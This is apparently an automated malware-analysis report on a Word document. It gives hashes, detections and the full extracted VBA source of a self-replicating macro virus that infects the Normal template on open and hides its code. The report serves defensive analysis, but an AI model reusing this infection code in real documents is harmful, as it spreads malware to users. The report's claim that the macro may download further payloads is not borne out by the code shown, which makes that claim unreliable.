Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 654e68965e88a8c4…

MALICIOUS

Office (OLE)

40.5 KB Created: 2099-10-18 14:41:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 230565bf166e3a4f224a2d674a176249 SHA-1: 46c77cdbe119a05d2fe270270b46500383d5dfe6 SHA-256: 654e68965e88a8c42dadf0a266091c44da96cc1e100087f4c1a89a6a2ad9a1e8
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing a VBA macro that executes automatically via the Document_Open subroutine. This macro is designed to obfuscate and potentially download additional malicious content, as indicated by the ClamAV detections and the heuristic firings for VBA macros and Document_Open execution. The script's intent is to infect the document and potentially establish persistence or download further stages.

Heuristics 3

  • ClamAV: Doc.Trojan.Codefore-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Codefore-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7303 bytes
SHA-256: 343a085d7b734025268ee45d4302ffdbf3f9522d9bb76a213c6c243b96ffa80f
Detection
ClamAV: Doc.Trojan.Pene-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()

Rem + - - - - - - - - - - - - - - - - - - - - - +
Rem | Stealth This Document Infection Engine    |
Rem | fast and 98 % stealth AND class infection |
Rem |                                           |
Rem | TDIE by Lord Arz      (Lord_Arz@gmx.net)  |
Rem + - - - - - - - - - - - - - - - - - - - - - +

On Error Resume Next    'catch all errors
ResetMe = String(5, Chr(13))    'generate stealth
ResetMe = ResetMe & String(300, "   ") & "Private Sub Document_Close(): "   'recover code
ResetMe = ResetMe & "With ThisDocument.VBProject.VBComponents(1).CodeModule: .DeleteLines 1, .CountOfLines: .InsertLines 1, ThisDocument.Variables(chr(65)).Value: End With: ThisDocument.Save: "   'recover code
ResetMe = ResetMe & "End Sub"   'recover code

For x = 1 To ActiveDocument.Variables.Count   'clear variables
    ActiveDocument.Variables(x).Delete
Next x

For x = 1 To Normal.ThisDocument.Variables.Count   'clear variables
    Normal.ThisDocument.Variables(x).Delete
Next x

With ThisDocument.VBProject.VBComponents(1).CodeModule  'read virus code
    VCC = .Lines(1, .CountOfLines)
End With

With ActiveDocument.VBProject.VBComponents(1).CodeModule    'delete code in Doc
    .DeleteLines 1, .CountOfLines
    .InsertLines 1, ResetMe 'insert stealth
End With

With Normal.ThisDocument.VBProject.VBComponents(1).CodeModule   'delete code in Normal
    .DeleteLines 1, .CountOfLines
    .InsertLines 1, ResetMe 'insert stealth
End With

ActiveDocument.Variables.Add (Chr(65)), VCC 'store code in variable area of Doc
Normal.ThisDocument.Variables.Add (Chr(65)), VCC    'store code in variale area of Normal

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeBackColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1"    'change background colors
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeForeColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1"  'change code colors

Penetrate:
'UC (Insert user code here):
Rem
Rem
'SP (path and program to start)
End Sub

' Processing file: /opt/analyzer/scan_staging/7e2e474705b54571baa101d11d886d4b.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 8502 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' Line #2:
' 	Rem 0x002E " + - - - - - - - - - - - - - - - - - - - - - +"
' Line #3:
' 	Rem 0x002E " | Stealth This Document Infection Engine    |"
' Line #4:
' 	Rem 0x002E " | fast and 98 % stealth AND class infection |"
' Line #5:
' 	Rem 0x002E " |                                           |"
' Line #6:
' 	Rem 0x002E " | TDIE by Lord Arz      (Lord_Arz@gmx.net)  |"
' Line #7:
' 	Rem 0x002E " + - - - - - - - - - - - - - - - - - - - - - +"
' Line #8:
' Line #9:
' 	OnError (Resume Next) 
' 	QuoteRem 0x0018 0x0010 "catch all errors"
' Line #10:
' 	LitDI2 0x0005 
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	ArgsLd String$ 0x0002 
' 	St ResetMe 
' 	QuoteRem 0x0020 0x0010 "generate stealth"
' Line #11:
' 	Ld ResetMe 
' 	LitDI2 0x012C 
' 	LitStr 0x0003 "   "
' 	ArgsLd String$ 0x0002 
' 	Concat 
' 	LitStr 0x001E "Private Sub Document_Close(): "
' 	Concat 
' 	St ResetMe 
' 	QuoteRem 0x004C 0x000C "recover code"
' Line #12:
' 	Ld ResetMe 
' 	LitStr 0x00AB "With ThisDocument.VBProject.VBComponents(1).CodeModule: .DeleteLines 1, .CountOfLines: .InsertLines 1, ThisDocument.Variables(chr(65)).Value: End With: ThisDocument.Save: "
' 	Concat 
' 	St ResetMe 
' 	QuoteRem 0x00C4 0x000C "recover code"
' Line #13:
' 	Ld ResetMe 
' 	LitStr 0x0007 "End Sub"
' 	Concat 
' 	St ResetMe 
' 	QuoteRem 0x0020 0x000C "recover code"
' Line #14:
' Line #15:
' 	StartForVariable 
' 	Ld x 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd Variables 
' 	MemLd Coun
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.